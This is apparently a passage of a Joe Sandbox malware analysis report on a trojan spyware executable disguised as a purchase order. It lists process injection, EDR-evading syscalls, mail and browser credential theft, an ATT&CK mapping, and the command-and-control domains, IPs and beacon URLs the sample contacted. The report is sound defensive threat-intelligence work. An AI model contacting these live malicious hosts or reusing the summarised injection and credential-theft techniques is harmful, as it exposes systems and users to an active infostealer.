            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515799 Sample: Purchase Order_ AEPL-2324-1... Startdate: 23/09/2024 Architecture: WINDOWS Score: 100 28 www.shopdj00.xyz 2->28 30 www.rtpngk.xyz 2->30 32 27 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 8 other signatures 2->50 10 Purchase Order_ AEPL-2324-1126.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 JkyHsYXxoyjW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 grpconv.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 JkyHsYXxoyjW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 bluegirls.blog 195.110.124.133, 49717, 49718, 49719 REGISTER-ASIT Italy 22->34 36 www.solisbysobha.net 198.50.252.64, 49725, 49726, 49727 OVHFR Canada 22->36 38 13 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase Order_ AEPL-2324-1126.exe27%VirustotalBrowse
            Purchase Order_ AEPL-2324-1126.exe100%AviraHEUR/AGEN.1321886
            Purchase Order_ AEPL-2324-1126.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.solisbysobha.net0%VirustotalBrowse
            bluegirls.blog0%VirustotalBrowse
            zz82x.top2%VirustotalBrowse
            chalet-tofane.net8%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            cluster580fc23f.abcty2.com0%VirustotalBrowse
            tempatmudisini01.click5%VirustotalBrowse
            ghs.googlehosted.com0%VirustotalBrowse
            www.deefbank.net0%VirustotalBrowse
            kovallo.cloud0%VirustotalBrowse
            www.bluegirls.blog0%VirustotalBrowse
            www.greekhause.org0%VirustotalBrowse
            www.tempatmudisini01.click7%VirustotalBrowse
            www.chalet-tofane.net2%VirustotalBrowse
            www.kovallo.cloud1%VirustotalBrowse
            www.085bet.xyz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.deefbank.net/i06p/0%Avira URL Cloudsafe
            http://www.bluegirls.blog/7m8b/0%Avira URL Cloudsafe
            http://www.tempatmudisini01.click/phdl/100%Avira URL Cloudmalware
            http://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.bodegamayorista.online/8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.zz82x.top/2lu6/0%Avira URL Cloudsafe
            http://www.greekhause.org/gxfy/0%Avira URL Cloudsafe
            http://www.rtpngk.xyz/yhsl/0%Avira URL Cloudsafe
            http://www.donante-de-ovulos.biz/8dtf/0%Avira URL Cloudsafe
            http://www.085bet.xyz/1zd7/0%Avira URL Cloudsafe
            http://www.2024tengxun361.buzz/xedw/0%Avira URL Cloudsafe
            http://www.085bet.xyz/1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            https://www.deefbank.net/i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCb0%Avira URL Cloudsafe
            http://www.chalet-tofane.net/uesf/0%Avira URL Cloudsafe
            http://www.sppsuperplast.online/hel6/0%Avira URL Cloudsafe
            http://www.kovallo.cloud/ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kn0%Avira URL Cloudsafe
            http://www.bodegamayorista.online0%Avira URL Cloudsafe
            http://www.sppsuperplast.online/hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.bodegamayorista.online/8xob/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://www.google.com0%Avira URL Cloudsafe
            http://www.mistsui.top/r48b/0%Avira URL Cloudsafe
            http://www.zz82x.top/2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.solisbysobha.net/s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLe0%Avira URL Cloudsafe
            http://www.chalet-tofane.net:80/uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG30%Avira URL Cloudsafe
            http://www.greekhause.org/gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.2024tengxun361.buzz/xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblS0%Avira URL Cloudsafe
            http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZm100%Avira URL Cloudmalware
            http://www.donante-de-ovulos.biz/8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.bluegirls.blog/7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L100%Avira URL Cloudmalware
            https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo0%Avira URL Cloudsafe
            http://www.mistsui.top/r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2L0%Avira URL Cloudsafe
            http://www.solisbysobha.net/s5b1/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bodegamayorista.online
            		84.32.84.32
            		truetrue
              		unknown
              www.solisbysobha.net
              		198.50.252.64
              		truetrueunknown
              bluegirls.blog
              		195.110.124.133
              		truetrueunknown
              chalet-tofane.net
              		62.149.128.40
              		truetrueunknown
              zz82x.top
              		38.47.232.196
              		truetrueunknown
              natroredirect.natrocdn.com
              		85.159.66.93
              		truetrueunknown
              cluster580fc23f.abcty2.com
              		154.198.53.36
              		truetrueunknown
              tempatmudisini01.click
              		103.21.221.4
              		truetrueunknown
              www.rtpngk.xyz
              		188.114.97.3
              		truetrue
                		unknown
                www.2024tengxun361.buzz
                		154.38.114.205
                		truetrue
                  		unknown
                  greekhause.org
                  		3.33.130.190
                  		truetrue
                    		unknown
                    www.mistsui.top
                    		162.0.238.246
                    		truetrue
                      		unknown
                      kovallo.cloud
                      		81.2.196.19
                      		truetrueunknown
                      www.donante-de-ovulos.biz
                      		199.59.243.227
                      		truetrue
                        		unknown
                        ghs.googlehosted.com
                        		142.250.186.51
                        		truefalseunknown
                        www.shopdj00.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.zz82x.top
                          		unknown
                          		unknowntrue
                            		unknown
                            www.bodegamayorista.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.deefbank.net
                              		unknown
                              		unknowntrueunknown
                              www.kovallo.cloud
                              		unknown
                              		unknowntrueunknown
                              www.greekhause.org
                              		unknown
                              		unknowntrueunknown
                              www.085bet.xyz
                              		unknown
                              		unknowntrueunknown
                              www.bluegirls.blog
                              		unknown
                              		unknowntrueunknown
                              www.tempatmudisini01.click
                              		unknown
                              		unknowntrueunknown
                              www.sppsuperplast.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.chalet-tofane.net
                                		unknown
                                		unknowntrueunknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.deefbank.net/i06p/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tempatmudisini01.click/phdl/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bluegirls.blog/7m8b/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bodegamayorista.online/8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zz82x.top/2lu6/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.greekhause.org/gxfy/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rtpngk.xyz/yhsl/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.donante-de-ovulos.biz/8dtf/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.085bet.xyz/1zd7/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.2024tengxun361.buzz/xedw/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.085bet.xyz/1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.chalet-tofane.net/uesf/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sppsuperplast.online/hel6/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kovallo.cloud/ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kntrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sppsuperplast.online/hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bodegamayorista.online/8xob/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mistsui.top/r48b/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zz82x.top/2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.solisbysobha.net/s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLetrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.greekhause.org/gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.2024tengxun361.buzz/xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblStrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.donante-de-ovulos.biz/8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bluegirls.blog/7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.mistsui.top/r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2Ltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.solisbysobha.net/s5b1/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabgrpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icogrpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.deefbank.net/i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgrpconv.exe, 00000005.00000002.3870343838.0000000005BC4000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.0000000003CE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.ecosia.org/newtab/grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.bodegamayorista.onlineJkyHsYXxoyjW.exe, 00000006.00000002.3871192963.00000000050F6000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.comgrpconv.exe, 00000005.00000002.3870343838.0000000005EE8000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.0000000004008000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.chalet-tofane.net:80/uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3grpconv.exe, 00000005.00000002.3870343838.000000000607A000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.000000000419A000.00000004.00000001.00040000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgrpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmgrpconv.exe, 00000005.00000002.3870343838.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.00000000031E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyogrpconv.exe, 00000005.00000002.3870343838.00000000053EA000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.000000000350A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                162.0.238.246
                                		www.mistsui.topCanada
                                		22612NAMECHEAP-NETUStrue
                                198.50.252.64
                                		www.solisbysobha.netCanada
                                		16276OVHFRtrue
                                154.38.114.205
                                		www.2024tengxun361.buzzUnited States
                                		174COGENT-174UStrue
                                62.149.128.40
                                		chalet-tofane.netItaly
                                		31034ARUBA-ASNITtrue
                                199.59.243.227
                                		www.donante-de-ovulos.bizUnited States
                                		395082BODIS-NJUStrue
                                84.32.84.32
                                		bodegamayorista.onlineLithuania
                                		33922NTT-LT-ASLTtrue
                                154.198.53.36
                                		cluster580fc23f.abcty2.comSeychelles
                                		26484IKGUL-26484UStrue
                                81.2.196.19
                                		kovallo.cloudCzech Republic
                                		24806INTERNET-CZKtis238403KtisCZtrue
                                85.159.66.93
                                		natroredirect.natrocdn.comTurkey
                                		34619CIZGITRtrue
                                103.21.221.4
                                		tempatmudisini01.clickunknown
                                		9905LINKNET-ID-APLinknetASNIDtrue
                                188.114.97.3
                                		www.rtpngk.xyzEuropean Union
                                		13335CLOUDFLARENETUStrue
                                195.110.124.133
                                		bluegirls.blogItaly
                                		39729REGISTER-ASITtrue
                                38.47.232.196
                                		zz82x.topUnited States
                                		174COGENT-174UStrue
                                142.250.186.51
                                		ghs.googlehosted.comUnited States
                                		15169GOOGLEUSfalse
                                3.33.130.190
                                		greekhause.orgUnited States
                                		8987AMAZONEXPANSIONGBtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1515799
                                Start date and time:2024-09-23 14:35:11 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 5s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Purchase Order_ AEPL-2324-1126.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/15
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 91%
                                • Number of executed functions: 54
                                • Number of non-executed functions: 303
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:37:20API Interceptor9797964x Sleep call for process: grpconv.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
